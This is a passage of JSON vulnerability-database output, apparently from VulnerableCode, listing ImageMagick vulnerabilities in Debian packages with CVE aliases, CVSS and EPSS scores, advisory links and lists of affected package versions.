"VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-15140" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rqm7-d751-myfa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49498?format=api", "vulnerability_id": "VCID-rrvd-vd81-sfdm", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-28463.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-28463.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-28463", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32485", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.3252", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32343", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32392", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.3242", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32423", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32385", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32358", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32395", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32372", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32344", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00129", "scoring_system": "epss", "scoring_elements": "0.32169", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-28463" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28463", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28463" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083056", "reference_id": "2083056", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2083056" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/5456-1/", "reference_id": "USN-5456-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5456-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-28463" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rrvd-vd81-sfdm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82474?format=api", "vulnerability_id": "VCID-rvjq-uks4-x3h3", "summary": "ImageMagick: a \"use of uninitialized value\" vulnerability in the function ReadCUTImage leading to a crash and DoS", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13135.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13135.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02588", "scoring_system": "epss", "scoring_elements": "0.85627", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.02588", "scoring_system": "epss", "scoring_elements": "0.85603", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.02588", "scoring_system": "epss", "scoring_elements": "0.85609", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.02588", "scoring_system": "epss", "scoring_elements": "0.85605", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85656", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85683", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85694", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85709", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85705", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85701", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85627", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85664", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.02637", "scoring_system": "epss", "scoring_elements": "0.85639", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": 